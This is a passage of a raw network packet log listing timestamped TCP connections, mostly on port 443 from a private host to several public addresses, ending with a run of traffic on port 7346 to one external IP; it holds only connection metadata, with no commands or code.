Jan 5, 2025 08:32:40.981229067 CET	49764	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:40.981256008 CET	443	49764	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:40.987649918 CET	443	49765	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:40.987848997 CET	49765	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:40.988099098 CET	49765	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:40.988116026 CET	443	49765	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:41.000428915 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.000471115 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.003334999 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.003362894 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.003369093 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.003380060 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.003412008 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.009649038 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.011392117 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.011403084 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.015901089 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.016113043 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.016128063 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.022314072 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.022772074 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.022780895 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.028517962 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.029019117 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.029032946 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.034779072 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.035330057 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.035341024 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.041088104 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.041312933 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.041320086 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.091774940 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.091881990 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.091973066 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.092104912 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.092113018 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.096059084 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.096452951 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.096467018 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.102406025 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.102569103 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.102583885 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.108643055 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.111392021 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.111402035 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.114945889 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.115041018 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.115063906 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.121247053 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.126733065 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.126759052 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.127542973 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.133821011 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.133861065 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.133888960 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.133896112 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.134052038 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.139664888 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.145128012 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.145164967 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.145173073 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.145185947 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.145245075 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.150593996 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.153656960 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.153678894 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.156055927 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.156122923 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.156131983 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.161458015 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.161524057 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.161530972 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.167181015 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.167256117 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.167262077 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.172445059 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.172507048 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.172514915 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.183119059 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.183157921 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.183160067 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.183168888 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.183264017 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.183279991 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.185648918 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.185723066 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.185729027 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.189348936 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.189424992 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.189430952 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.192938089 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.192982912 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.192989111 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.196424007 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.196470976 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.196477890 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.199882984 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.199928045 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.199934006 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.202512980 CET	443	49766	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:41.203443050 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.203502893 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.203509092 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.206039906 CET	49766	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:41.206063032 CET	443	49766	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:41.206803083 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.206898928 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.206912041 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.207094908 CET	443	49766	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:41.207144022 CET	49766	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:41.210303068 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.210355997 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.210361958 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.211239100 CET	49766	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:41.211311102 CET	443	49766	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:41.211473942 CET	49766	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:41.211482048 CET	443	49766	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:41.213926077 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.213979006 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.213994026 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.217324972 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.217551947 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.217557907 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.220853090 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.220967054 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.220973969 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.224344015 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.224411964 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.224421978 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.227781057 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.227828026 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.227834940 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.231365919 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.231414080 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.231420040 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.234867096 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.234921932 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.234927893 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.238322973 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.238470078 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.238478899 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.242086887 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.242166996 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.242187023 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.247622967 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.247687101 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.247693062 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.248543978 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.248632908 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.248647928 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.249686956 CET	49767	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:41.249727964 CET	443	49767	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:41.249788046 CET	49767	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:41.250180960 CET	49767	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:41.250195026 CET	443	49767	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:41.252932072 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.252969980 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.252975941 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.255101919 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.255152941 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.255157948 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.258582115 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.258622885 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.258626938 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.258632898 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.258671045 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.261256933 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.264535904 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.264565945 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.264579058 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.264585018 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.264636993 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.267510891 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.274641037 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.274674892 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.274708986 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.274715900 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.274770975 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.274775028 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.275105000 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.275134087 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.275151014 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.275162935 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.275201082 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.276555061 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.279326916 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.279360056 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.279383898 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.279391050 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.279407024 CET	49766	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:41.279444933 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.279500008 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.279562950 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.279627085 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.282263994 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:41.282278061 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:41.339694977 CET	443	49766	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:41.339752913 CET	443	49766	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:41.339792013 CET	49766	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:41.340190887 CET	49766	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:41.340204954 CET	443	49766	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:41.721375942 CET	443	49767	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:41.854273081 CET	49767	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:42.263515949 CET	49767	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:42.263555050 CET	443	49767	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:42.264097929 CET	443	49767	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:42.289227009 CET	49767	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:42.289313078 CET	443	49767	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:42.290222883 CET	49767	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:42.331136942 CET	49769	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:42.331181049 CET	443	49769	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.331265926 CET	49769	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:42.331446886 CET	49770	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:42.331496000 CET	443	49770	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.331571102 CET	49770	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:42.331639051 CET	49769	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:42.331654072 CET	443	49769	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.331760883 CET	49770	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:42.331773996 CET	443	49770	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.335331917 CET	443	49767	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:42.394655943 CET	443	49767	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:42.394723892 CET	443	49767	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:42.394846916 CET	49767	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:42.395391941 CET	49767	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:42.395407915 CET	443	49767	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:42.614275932 CET	49771	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:42.614320040 CET	443	49771	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:42.614454985 CET	49771	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:42.614712954 CET	49772	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:42.614744902 CET	443	49772	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:42.614801884 CET	49772	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:42.615072966 CET	49771	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:42.615087032 CET	443	49771	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:42.615499020 CET	49772	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:42.615518093 CET	443	49772	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:42.807621956 CET	443	49769	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.808227062 CET	49769	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:42.808253050 CET	443	49769	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.808613062 CET	443	49769	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.809340000 CET	49769	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:42.809885979 CET	443	49769	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.817404985 CET	443	49770	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.822488070 CET	49770	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:42.822514057 CET	443	49770	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.822873116 CET	443	49770	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.823357105 CET	49770	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:42.823421955 CET	443	49770	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:42.959886074 CET	49769	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:42.959949970 CET	49770	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:43.082695961 CET	443	49771	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:43.092643023 CET	443	49772	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:43.096390009 CET	49771	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:43.096415043 CET	443	49771	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:43.096529961 CET	49772	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:43.096544981 CET	443	49772	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:43.096892118 CET	443	49771	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:43.096900940 CET	443	49772	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:43.106251955 CET	49772	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:43.106321096 CET	443	49772	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:43.106867075 CET	49771	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:43.106955051 CET	443	49771	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:43.165153980 CET	49772	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:43.182089090 CET	49771	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:57.714123964 CET	443	49769	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:57.714216948 CET	443	49769	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:57.714277029 CET	49769	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:57.718033075 CET	443	49770	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:57.718111992 CET	443	49770	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:57.718166113 CET	49770	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:57.992470026 CET	443	49771	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:57.992554903 CET	443	49771	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:57.992666006 CET	49771	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:57.998459101 CET	443	49772	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:57.998538971 CET	443	49772	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:57.998673916 CET	49772	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:59.818183899 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:59.823118925 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.823136091 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.823157072 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.823167086 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.823174000 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:59.823184013 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.823194981 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.823215961 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:59.823225975 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.823237896 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.823239088 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:59.823282003 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:59.823322058 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.823333025 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.823373079 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:59.827955961 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.828006029 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:59.828049898 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.828066111 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.828077078 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.828094959 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.828113079 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:59.828147888 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:59.828155994 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.828300953 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.828310966 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.828319073 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.828386068 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:59.828427076 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:59.831051111 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:59.832925081 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.832973957 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.832977057 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:59.833019972 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:59.833020926 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.833137989 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.833148956 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.833187103 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:59.833256006 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.833272934 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.833313942 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:59.833342075 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.833420038 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.833430052 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.833487988 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.833498001 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.833507061 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.833523989 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.833538055 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.833563089 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.833571911 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.833589077 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.833597898 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.833641052 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.833650112 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.833688974 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.833698034 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.833728075 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.833736897 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.835901976 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.835911989 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.835920095 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.837749004 CET	7346	49741	195.133.78.18	192.168.2.4
